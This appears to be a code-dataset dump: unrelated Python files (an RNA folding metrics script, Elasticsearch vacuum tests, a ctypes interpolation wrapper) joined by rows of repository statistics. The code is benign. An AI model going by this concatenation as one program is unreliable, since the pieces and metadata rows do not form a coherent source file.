line_8, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_consalifold_mccs), max(ref_sa_plus_consalifold_mccs), label = "Reference + ConsAlifold", marker = "s", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[1])
line_9, = pyplot.plot(min_gamma + numpy.argmax(centroidhomfold_mccs), max(centroidhomfold_mccs), label = "CentroidHomfold", marker = "^", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[2])
line_10, = pyplot.plot(min_gamma + numpy.argmax(turbofold_mccs), max(turbofold_mccs), label = "TurboFold", marker = "p", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[5])
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_ss_estimation_other_types.eps", bbox_inches = "tight")
pyplot.clf()
def get_metrics(bin_counts):
(tp, tn, fp, fn) = bin_counts
ppv = get_ppv(tp, fp)
sens = get_sens(tp, fn)
fpr = get_fpr(tn, fp)
f1_score = get_f1_score(ppv, sens)
mcc = get_mcc(tp, tn, fp, fn)
return ppv, sens, fpr, f1_score, mcc
def get_bin_counts(params):
rna_seq_lens, estimated_css, ref_css = params
num_of_rnas = len(rna_seq_lens)
tp = fp = tn = fn = 0
for m in range(0, num_of_rnas):
sub_estimated_css = estimated_css[m]
sub_ref_css = ref_css[m]
rna_seq_len_1 = rna_seq_lens[m]
for i in range(0, rna_seq_len_1):
for j in range(i + 1, rna_seq_len_1):
estimated_bin = (i, j) in sub_estimated_css
ref_bin = (i, j) in sub_ref_css
if estimated_bin == ref_bin:
if estimated_bin == True:
tp += 1
else:
tn += 1
else:
if estimated_bin == True:
fp += 1
else:
fn += 1
return tp, tn, fp, fn
def final_sum(results):
final_tp = final_tn = final_fp = final_fn = 0.
for tp, tn, fp, fn in results:
final_tp += tp
final_tn += tn
final_fp += fp
final_fn += fn
return (final_tp, final_tn, final_fp, final_fn)
def get_f1_score(ppv, sens):
return 2 * ppv * sens / (ppv + sens)
def get_mcc(tp, tn, fp, fn):
return (tp * tn - fp * fn) / sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
def get_ppv(tp, fp):
return tp / (tp + fp)
def get_sens(tp, fn):
return tp / (tp + fn)
def get_fpr(tn, fp):
return fp / (tn + fp)
def get_sss(ss_file_path):
sss = []
ss_strings = []
ss_strings = [rec.seq for rec in SeqIO.parse(ss_file_path, "fasta")]
sss = []
for (i, ss_string) in enumerate(ss_strings):
sss.append({})
for (left, right) in bracket_pairs:
stack = []
for (j, char) in enumerate(ss_string):
if char == left:
stack.append(j)
elif char == right:
pos = stack.pop()
sss[i][(pos, j)] = True
return sss
if __name__ == "__main__":
main()
| 72.915528 | 265 | 0.765337 | 8,023 | 58,697 | 5.134738 | 0.026175 | 0.061899 | 0.04214 | 0.021361 | 0.931425 | 0.903777 | 0.865836 | 0.808913 | 0.750558 | 0.696014 | 0 | 0.010279 | 0.119904 | 58,697 | 804 | 266 | 73.006219 | 0.787181 | 0.009081 | 0 | 0.212987 | 0 | 0 | 0.089005 | 0.02702 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012987 | false | 0 | 0.011688 | 0.006494 | 0.036364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
092b89c0e8c6b5d5ac8b660ffda0f6e37df58629 | 11,882 | py | Python | guillotina_elasticsearch/tests/test_vacuum.py | vjove/guillotina_elasticsearch | 1c04f86caa19cb37f0f182cc97b09bacbcf5d729 | [
"BSD-2-Clause"
] | null | null | null | guillotina_elasticsearch/tests/test_vacuum.py | vjove/guillotina_elasticsearch | 1c04f86caa19cb37f0f182cc97b09bacbcf5d729 | [
"BSD-2-Clause"
] | null | null | null | guillotina_elasticsearch/tests/test_vacuum.py | vjove/guillotina_elasticsearch | 1c04f86caa19cb37f0f182cc97b09bacbcf5d729 | [
"BSD-2-Clause"
] | null | null | null | from guillotina import task_vars
from guillotina.component import get_utility
from guillotina.db.uid import get_short_uid
from guillotina.interfaces import ICatalogUtility
from guillotina_elasticsearch.commands.vacuum import Vacuum
from guillotina_elasticsearch.interfaces import DOC_TYPE
from guillotina_elasticsearch.tests.utils import add_content
from guillotina_elasticsearch.tests.utils import run_with_retries
from guillotina_elasticsearch.tests.utils import setup_txn_on_container
import asyncio
import json
import os
import pytest
pytestmark = [pytest.mark.asyncio]
DATABASE = os.environ.get("DATABASE", "DUMMY")
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
async def test_adds_missing_elasticsearch_entry(es_requester):
async with es_requester as requester:
await add_content(requester)
search = get_utility(ICatalogUtility)
container, request, txn, tm = await setup_txn_on_container(requester)
task_vars.request.set(request)
async def _test():
assert await search.get_doc_count(container) == 110
await run_with_retries(_test, requester)
for key in await container.async_keys():
ob = await container.async_get(key)
await search.remove(container, [ob], request=request)
async def __test():
assert await search.get_doc_count(container) == 0
await run_with_retries(__test, requester)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_missing()
await vacuum.check_orphans()
assert len(vacuum.orphaned) == 0
assert len(vacuum.out_of_date) == 0
assert len(vacuum.missing) == 110
async def ___test():
assert await search.get_doc_count(container) == 110
await run_with_retries(___test, requester)
await tm.abort(txn=txn)
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
@pytest.mark.flaky(reruns=5)
async def test_updates_out_of_data_es_entries(es_requester):
async with es_requester as requester:
await add_content(requester)
await asyncio.sleep(1)
container, request, txn, tm = await setup_txn_on_container(requester)
task_vars.request.set(request)
search = get_utility(ICatalogUtility)
index_name = await search.get_container_index_name(container)
await search.update_by_query(
{"script": {"lang": "painless", "inline": "ctx._source.tid = 0"}},
indexes=[index_name],
)
async def _test():
assert await search.get_doc_count(container) == 110
await run_with_retries(_test, requester, retry_wait=1)
await asyncio.sleep(1)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_missing()
await vacuum.check_orphans()
assert len(vacuum.orphaned) == 0
assert len(vacuum.missing) == 0
assert len(vacuum.out_of_date) == 110
await tm.abort(txn=txn)
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
async def test_removes_orphaned_es_entry(es_requester):
async with es_requester as requester:
container, request, txn, tm = await setup_txn_on_container(requester)
search = get_utility(ICatalogUtility)
await search.index(
container, {"foobar": {"title": "foobar", "type_name": "Item"}}
)
async def _test():
assert await search.get_doc_count(container) == 1
await run_with_retries(_test, requester)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_orphans()
await vacuum.check_missing()
assert len(vacuum.orphaned) == 1
assert len(vacuum.missing) == 0
assert len(vacuum.out_of_date) == 0
async def __test():
assert await search.get_doc_count(container) == 0
await run_with_retries(__test, requester)
await tm.abort(txn=txn)
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
async def test_vacuum_with_sub_indexes(es_requester):
async with es_requester as requester:
await add_content(requester, num_folders=2, num_items=5, path="/db/guillotina/")
cresp, _ = await requester(
"POST",
"/db/guillotina/",
data=json.dumps(
{
"@type": "UniqueIndexContent",
"title": "UniqueIndexContent",
"id": "foobar",
}
),
)
await add_content(
requester, num_folders=2, num_items=5, path="/db/guillotina/foobar"
) # noqa
search = get_utility(ICatalogUtility)
content_index_name = (
"guillotina-db-guillotina__uniqueindexcontent-{}".format( # noqa
get_short_uid(cresp["@uid"])
)
)
container, request, txn, tm = await setup_txn_on_container(requester)
task_vars.request.set(request)
await asyncio.sleep(1)
async def _test():
assert await search.get_doc_count(container) == 13
assert (
await search.get_doc_count(index_name=content_index_name) == 12
) # noqa
await run_with_retries(_test, requester)
for key in await container.async_keys():
if key == "foobar":
continue
ob = await container.async_get(key)
await search.remove(container, [ob], request=request)
await asyncio.sleep(1)
foobar = await container.async_get("foobar")
for key in await foobar.async_keys():
ob = await foobar.async_get(key)
await search.remove(container, [ob], request=request)
await asyncio.sleep(1)
await search.index(
container, {"foobar1": {"title": "foobar", "type_name": "Item"}}
)
await search.index(
container,
{
"foobar2": {
"title": "foobar",
"type_name": "Item",
"__indexes__": [content_index_name],
}
},
)
async def __test():
assert await search.get_doc_count(container) == 2
assert (
await search.get_doc_count(index_name=content_index_name) == 1
) # noqa
await run_with_retries(__test, requester)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_missing()
await vacuum.check_orphans()
assert len(vacuum.orphaned) == 2
assert len(vacuum.out_of_date) == 0
assert len(vacuum.missing) == 24
async def ___test():
assert await search.get_doc_count(container) == 13
assert (
await search.get_doc_count(index_name=content_index_name) == 12
) # noqa
await run_with_retries(___test, requester)
await tm.abort(txn=txn)
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
async def test_reindexes_moved_content(es_requester):
async with es_requester as requester:
resp1, _ = await requester(
"POST",
"/db/guillotina/",
data=json.dumps({"@type": "Folder", "id": "foobar"}),
)
resp2, _ = await requester(
"POST",
"/db/guillotina/foobar",
data=json.dumps({"@type": "Folder", "id": "foobar"}),
)
resp3, _ = await requester(
"POST",
"/db/guillotina/foobar/foobar",
data=json.dumps({"@type": "Folder", "id": "foobar"}),
)
container, request, txn, tm = await setup_txn_on_container(requester)
search = get_utility(ICatalogUtility)
index_name = await search.get_container_index_name(container)
async def _test():
assert await search.get_doc_count(container) == 3
result = await search.get_connection().get(
index=index_name, doc_type="_all", id=resp3["@uid"]
)
assert result is not None
await run_with_retries(_test, requester)
# mess with index data to make it look like it was moved
await search.get_connection().update(
index=index_name,
id=resp1["@uid"],
doc_type=DOC_TYPE,
body={
"doc": {
"path": "/moved-foobar",
"parent_uuid": "FOOOBBAR MOVED TO NEW PARENT",
}
},
)
await search.get_connection().update(
index=index_name,
id=resp2["@uid"],
doc_type=DOC_TYPE,
body={"doc": {"path": "/moved-foobar/foobar"}},
)
await search.get_connection().update(
index=index_name,
id=resp3["@uid"],
doc_type=DOC_TYPE,
body={"doc": {"path": "/moved-foobar/foobar/foobar"}},
)
async def _test():
result = await search.get_connection().get(
index=index_name,
doc_type="_all",
id=resp3["@uid"],
stored_fields="path",
)
assert result["fields"]["path"] == ["/moved-foobar/foobar/foobar"]
result = await search.get_connection().get(
index=index_name,
doc_type="_all",
id=resp1["@uid"],
stored_fields="path,parent_uuid",
)
assert result["fields"]["path"] == ["/moved-foobar"]
assert result["fields"]["parent_uuid"] == ["FOOOBBAR MOVED TO NEW PARENT"]
await run_with_retries(_test, requester)
await asyncio.sleep(2)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_missing()
assert len(vacuum.orphaned) == 0
assert len(vacuum.missing) == 1
await asyncio.sleep(2)
async def __test():
result = await search.get_connection().get(
index=index_name,
doc_type="_all",
id=resp3["@uid"],
stored_fields="path,parent_uuid",
)
assert result["fields"]["path"] == ["/foobar/foobar/foobar"]
result = await search.get_connection().get(
index=index_name,
doc_type="_all",
id=resp1["@uid"],
stored_fields="path,parent_uuid",
)
assert result["fields"]["path"] == ["/foobar"]
assert (
result["fields"]["parent_uuid"] != "FOOOBBAR MOVED TO NEW PARENT"
) # noqa
await run_with_retries(__test, requester)
await tm.abort(txn=txn)
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
async def test_vacuum_with_multiple_containers(es_requester):
async with es_requester as requester:
# create another container, force to iterate differently
_, status = await requester(
"POST", "/db", data=json.dumps({"@type": "Container", "id": "foobar"})
)
assert status == 200
await add_content(requester, num_items=100)
search = get_utility(ICatalogUtility)
container, request, txn, tm = await setup_txn_on_container(requester)
task_vars.request.set(request)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_missing()
await vacuum.check_orphans()
async def ___test():
assert await search.get_doc_count(container) == 1010
await run_with_retries(___test, requester)
await tm.abort(txn=txn)
| 32.732782 | 88 | 0.589042 | 1,319 | 11,882 | 5.078089 | 0.11903 | 0.050911 | 0.050164 | 0.041804 | 0.802329 | 0.784413 | 0.745745 | 0.73828 | 0.701851 | 0.652583 | 0 | 0.00954 | 0.303063 | 11,882 | 362 | 89 | 32.823204 | 0.7993 | 0.011698 | 0 | 0.58363 | 0 | 0 | 0.088717 | 0.016363 | 0 | 0 | 0 | 0 | 0.128114 | 1 | 0 | false | 0 | 0.046263 | 0 | 0.046263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1190bf3f7a84ff94c5639ae5692fe7b310feff3e | 30 | py | Python | activitywatch/filters/__init__.py | ActivityWatch/activitywatch-old | e69b071ff701368cee7bac5d01e5936c200e58be | [
"MIT"
] | 4 | 2017-01-30T16:27:18.000Z | 2017-09-28T19:14:13.000Z | activitywatch/filters/__init__.py | ActivityWatch/activitywatch-old | e69b071ff701368cee7bac5d01e5936c200e58be | [
"MIT"
] | null | null | null | activitywatch/filters/__init__.py | ActivityWatch/activitywatch-old | e69b071ff701368cee7bac5d01e5936c200e58be | [
"MIT"
] | 2 | 2020-06-22T07:11:51.000Z | 2020-12-11T02:46:22.000Z | from .split import SplitFilter | 30 | 30 | 0.866667 | 4 | 30 | 6.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 30 | 1 | 30 | 30 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
eec9f692ddb2117e5196f654f5ff6d5a1a44e786 | 33 | py | Python | venv/Lib/site-packages/altair/vega/__init__.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 6,831 | 2016-09-23T19:35:19.000Z | 2022-03-31T13:29:39.000Z | venv/Lib/site-packages/altair/vega/__init__.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 2,068 | 2016-09-23T14:53:23.000Z | 2022-03-31T01:43:15.000Z | venv/Lib/site-packages/altair/vega/__init__.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 711 | 2016-09-26T16:59:18.000Z | 2022-03-24T11:32:40.000Z | # flake8: noqa
from .v5 import *
| 11 | 17 | 0.666667 | 5 | 33 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0.212121 | 33 | 2 | 18 | 16.5 | 0.769231 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
eedbc6eb6b3a33f55f7d59ac4359aa1b3d9f533b | 48 | py | Python | weixin/scripts/cron.py | lionsin/weixin | 5d818a800017aeb64367f104cbc6076f6f5b481a | [
"MIT"
] | 2 | 2020-03-02T03:56:24.000Z | 2020-12-07T16:14:21.000Z | weixin/scripts/cron.py | lionsin/weixin | 5d818a800017aeb64367f104cbc6076f6f5b481a | [
"MIT"
] | 1 | 2020-01-23T13:14:32.000Z | 2020-01-23T13:15:34.000Z | weixin/scripts/cron.py | lionsin/weixin | 5d818a800017aeb64367f104cbc6076f6f5b481a | [
"MIT"
] | 1 | 2020-01-23T12:58:57.000Z | 2020-01-23T12:58:57.000Z | import sys
print(sys.path)
print(0)
# 这是一条注释
| 6 | 15 | 0.6875 | 8 | 48 | 4.125 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.1875 | 48 | 7 | 16 | 6.857143 | 0.820513 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
6dc89c9a907e4fe5f88da6f9d1edda431541357e | 27,273 | py | Python | sandbox/fortran/interpolate.py | jmark/turbubox | 17fd3214ad4cb0c360bdb628d7bd270e8b00aadc | [
"MIT"
] | null | null | null | sandbox/fortran/interpolate.py | jmark/turbubox | 17fd3214ad4cb0c360bdb628d7bd270e8b00aadc | [
"MIT"
] | null | null | null | sandbox/fortran/interpolate.py | jmark/turbubox | 17fd3214ad4cb0c360bdb628d7bd270e8b00aadc | [
"MIT"
] | null | null | null | import numpy as np
import ctypes as ct
from numpy.ctypeslib import ndpointer
import sys
import os
def find_file(fname, paths):
for path in paths:
for root, dirs, files in os.walk(path):
if fname in files:
return os.path.join(root, fname)
raise FileNotFoundError("Cannot find '%s' in any of %s." % (fname, paths))
lib = ct.cdll.LoadLibrary(find_file('libfortinterpolate.so', sys.path))
ptr_int8 = ndpointer(ct.c_int8, flags="C_CONTIGUOUS")
ptr_int32 = ndpointer(ct.c_int32, flags="C_CONTIGUOUS")
ptr_double = ndpointer(ct.c_double, flags="C_CONTIGUOUS")
def carray(ndarray, dtype=None):
return np.require(ndarray, dtype=dtype, requirements=['C','A'])
lib.foo.argtypes = (
ct.c_int32, ct.c_int32, ptr_double, ptr_double,
)
def foo(input):
output = np.zeros_like(input)
lib.foo(
input.shape[0], input.shape[1], carray(input), carray(output),
)
return output
if False:
# =========================================================================== #
# double
# LagrangePolynomial(const double *xs, const int xslen, const int j, const double X);
lib.LagrangePolynomial.restype = ct.c_double
lib.LagrangePolynomial.argtypes = [
ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ct.c_int, ct.c_int, ct.c_double
]
def LagrangePolynomial(xs, j, X):
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C', 'A'])
return lib.LagrangePolynomial(xs, len(xs), int(j), float(X))
# =========================================================================== #
# void
# lagrange_interpolate_2d_RG(
# const int xslen, const double *xs, const double *fs,
# const int Xslen, const double *Xs, double *Fs
# );
lib.lagrange_interpolate_2d_RG.argtypes = [
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS")
]
def lagrange_interpolate_2d_RG(xs, Xs, fs):
shape = fs.shape
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C','A'])
Xs = np.require(Xs.ravel(), dtype=np.double, requirements=['C','A'])
fs = np.require(fs.ravel(), dtype=np.double, requirements=['C','A'])
Fs = np.zeros(len(Xs)**2,dtype=np.double)
Fs = np.require(Fs.ravel(), dtype=np.double, requirements=['C','A','W'])
lib.lagrange_interpolate_2d_RG(len(xs),xs,fs, len(Xs),Xs,Fs)
return Fs.reshape([len(Xs)]*2)
# =========================================================================== #
# void
# lagrange_interpolate_3d_RG(
# const int xslen, const double *xs, const double *fs,
# const int Xslen, const double *Xs, double *Fs
# );
lib.lagrange_interpolate_3d_RG.argtypes = [
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS")
]
def lagrange_interpolate_3d_RG(xs, Xs, fs):
shape = fs.shape
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C','A'])
Xs = np.require(Xs.ravel(), dtype=np.double, requirements=['C','A'])
fs = np.require(fs.ravel(), dtype=np.double, requirements=['C','A'])
Fs = np.zeros(len(Xs)**3,dtype=np.double)
Fs = np.require(Fs.ravel(), dtype=np.double, requirements=['C','A','W'])
lib.lagrange_interpolate_3d_RG(len(xs),xs,fs, len(Xs),Xs,Fs)
return Fs.reshape([len(Xs)]*3)
# =========================================================================== #
t_ndouble = ndpointer(ct.c_double, flags="C_CONTIGUOUS")
t_nint = ndpointer(ct.c_int, flags="C_CONTIGUOUS")
t_int = ct.c_int
# void
# box_to_elements(
# int Nx, int Ny, int Nz, double *boxptr,
# int nelems, int nx, int ny, int nz, double *offsetsptr, double *elemsptr);
lib.box_to_elements.argtypes = [
t_int, t_int, t_int, t_ndouble,
t_int, t_ndouble,
t_int, t_int, t_int, t_ndouble, t_int
]
def box_to_elements(box, flx, neighbors=0):
Nnodes = (np.array(box.shape)//flx.mesh.meshshape)[0]
lls, _ = flx.mesh.get_cell_coords()
offsets = Nnodes * lls / flx.mesh.elemsize
N = Nnodes + 2*neighbors
elems = np.zeros([flx.mesh.nrelems, N,N,N], dtype=np.double)
boxptr = np.require(box.ravel(), dtype=np.double, requirements=['C','A'])
elemsptr = np.require(elems.ravel(), dtype=np.double, requirements=['C','A'])
ofsptr = np.require(offsets.ravel(), dtype=np.double, requirements=['C', 'A'])
lib.box_to_elements(box.shape[0], box.shape[1], box.shape[2], boxptr, flx.mesh.nrelems, ofsptr, elems[0].shape[0], elems[0].shape[1], elems[0].shape[2], elemsptr, neighbors)
return elemsptr.reshape(elems.shape)
# =========================================================================== #
lib.elements_to_box.argtypes = [
t_int, t_int, t_int, t_ndouble,
t_int, t_ndouble,
t_int, t_int, t_int, t_ndouble
]
def elements_to_box(elems, mesh):
# lower left corners normed to unit intervall
lls = (mesh.domain[0] + mesh.elemcoords[0])/mesh.domainsize
box = np.zeros(elems[0].shape * mesh.meshshape)
offsets = np.array(box.shape) * lls
boxptr = np.require(box.ravel(), dtype=np.double, requirements=['C','A'])
elemsptr = np.require(elems.ravel(), dtype=np.double, requirements=['C','A'])
ofsptr = np.require(offsets.ravel(), dtype=np.double, requirements=['C', 'A'])
lib.elements_to_box(box.shape[0], box.shape[1], box.shape[2], boxptr, mesh.nrelems, ofsptr, elems[0].shape[0], elems[0].shape[1], elems[0].shape[2], elemsptr)
return boxptr.reshape(box.shape)
# =========================================================================== #
lib.elements_to_box_fv.argtypes = [
t_int, t_int, t_int, t_ndouble,
t_int, t_ndouble,
t_int, t_int, t_int, t_ndouble,
t_nint
]
def elements_to_box_fv(elems, mesh, box, fvs):
# lower left corners normed to unit intervall
lls = (mesh.domain[0] + mesh.elemcoords[0])/mesh.domainsize
#box = np.zeros(elems[0].shape * mesh.meshshape)
offsets = np.array(box.shape) * lls
boxptr = np.require(box.ravel(), dtype=np.double, requirements=['C','A'])
elemsptr = np.require(elems.ravel(), dtype=np.double, requirements=['C','A'])
ofsptr = np.require(offsets.ravel(), dtype=np.double, requirements=['C', 'A'])
fvsptr = np.require(fvs.ravel(), dtype=np.int, requirements=['C','A'])
lib.elements_to_box_fv(
box.shape[0], box.shape[1], box.shape[2], boxptr,
mesh.nrelems, ofsptr,
elems[0].shape[0], elems[0].shape[1], elems[0].shape[2], elemsptr,
fvs)
return boxptr.reshape(box.shape)
# =========================================================================== #
lib.box_to_elements_avg_boundaries.argtypes = [
t_int, t_int, t_int, t_ndouble,
t_int, t_ndouble,
t_int, t_int, t_int, t_ndouble
]
def box_to_elements_avg_boundaries(box, flx):
lls, _ = flx.mesh.get_cell_coords()
offsets = (flx.Nout) * lls / flx.mesh.cellsize
N = flx.Nout
elems = np.zeros([flx.mesh.nrelems, N,N,N], dtype=np.double)
boxptr = np.require(box.ravel(), dtype=np.double, requirements=['C','A'])
ofsptr = np.require(offsets.ravel(), dtype=np.double, requirements=['C', 'A'])
elemsptr = np.require(elems.ravel(), dtype=np.double, requirements=['C','A','W'])
lib.box_to_elements_avg_boundaries(box.shape[0], box.shape[1], box.shape[2], boxptr, flx.mesh.nrelems, ofsptr, elems[0].shape[0], elems[0].shape[1], elems[0].shape[2], elemsptr)
return elemsptr.reshape(elems.shape)
# =========================================================================== #
# void
# change_basis_3d(
# const int nelems, const int nn,
# const double *Vdm, const double *fss, double *Fss);
lib.change_basis_3d.argtypes = [
t_int, t_int, t_ndouble, t_ndouble, t_ndouble
]
def change_basis(Vd,fs):
nn,NN = Vd.shape
Fs = np.empty([len(fs)]+3*[NN])
Vdptr = np.require(Vd, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
lib.change_basis_3d(
len(fs), NN, Vdptr, fsptr, Fsptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# void
# change_basis_3d_2(
# const int nelems, const int nn,
# const double *Vdm, const double *fss, double *Fss);
lib.change_basis_3d_2.argtypes = [
t_int, t_int, t_ndouble, t_ndouble, t_ndouble
]
def change_basis_2(Vd,fs):
nn,NN = Vd.shape
Fs = np.empty([len(fs)]+3*[NN])
Vdptr = np.require(Vd, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
lib.change_basis_3d_2(
len(fs), NN, Vdptr, fsptr, Fsptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# void
# change_grid_space_2d_2(
# const int nelems,
# const int nx, const int ny,
# const int Nx, const int Ny,
# const double *Lss, const double *fss, double *Fss);
lib.change_grid_space_2d_2.argtypes = [
t_int,
t_int, t_int,
t_int, t_int,
t_ndouble, t_ndouble, t_ndouble
]
def change_grid_space_2d_2(Ls,fs):
sh = Ls.shape
Fs = np.empty([len(fs), sh[0], sh[1]])
Lsptr = np.require(Ls, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
lib.change_grid_space_2d_2(
len(fs), sh[2], sh[3], sh[0], sh[1], Lsptr, fsptr, Fsptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# void
# change_grid_space_2d(
# const int nelems,
# const int nx, const int ny, const double *xs, double *fss,
# const int Nx, const int Ny, const double *Xs, double *Fss);
lib.change_grid_space_2d.argtypes = [
t_int,
t_int, t_int, t_ndouble, t_ndouble,
t_int, t_int, t_ndouble, t_ndouble
]
def change_grid_space_2d(fs,xs,Xs):
Fs = np.empty([len(fs), len(Xs), len(Xs)])
xsptr = np.require(xs, dtype=np.double, requirements=['C','A'])
Xsptr = np.require(Xs, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
lib.change_grid_space_2d(
len(fs),
len(xs), len(xs), xsptr, fsptr,
len(Xs), len(Xs), Xsptr, Fsptr,
)
return Fsptr
# =========================================================================== #
# void
# change_grid_space(
# const int nelems,
# const int nx, const int ny, const int nz ,const double *xs, double *fss,
# const int Nx, const int Ny, const int Nz ,const double *Xs, double *Fss);
lib.change_grid_space.argtypes = [
t_int,
t_int, t_int, t_int, t_ndouble, t_ndouble,
t_int, t_int, t_int, t_ndouble, t_ndouble
]
def change_grid_space(fs,xs,Xs):
Fs = np.empty([len(fs), len(Xs), len(Xs), len(Xs)])
xsptr = np.require(xs, dtype=np.double, requirements=['C','A'])
Xsptr = np.require(Xs, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
lib.change_grid_space(
len(fs),
len(xs), len(xs), len(xs), xsptr, fsptr,
len(Xs), len(Xs), len(Xs), Xsptr, Fsptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# void
# change_grid_space_dg_fv(
# const int nelems,
# const int nx, const int ny, const int nz ,const double *xs, double *fss,
# const int Nx, const int Ny, const int Nz ,const double *Xs, double *Fss,
# const int *fvs);
lib.change_grid_space_dg_fv.argtypes = [
t_int,
t_int, t_int, t_int, t_ndouble, t_ndouble,
t_int, t_int, t_int, t_ndouble, t_ndouble,
t_nint
]
def change_grid_space_dg_fv(fs,xs,Xs,FV):
Fs = np.empty([len(fs), len(Xs), len(Xs), len(Xs)])
xsptr = np.require(xs, dtype=np.double, requirements=['C','A'])
Xsptr = np.require(Xs, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
FVptr = np.require(FV, dtype=np.int32, requirements=['C','A'])
lib.change_grid_space_dg_fv(
len(fs),
len(xs), len(xs), len(xs), xsptr, fsptr,
len(Xs), len(Xs), len(Xs), Xsptr, Fsptr,
FVptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
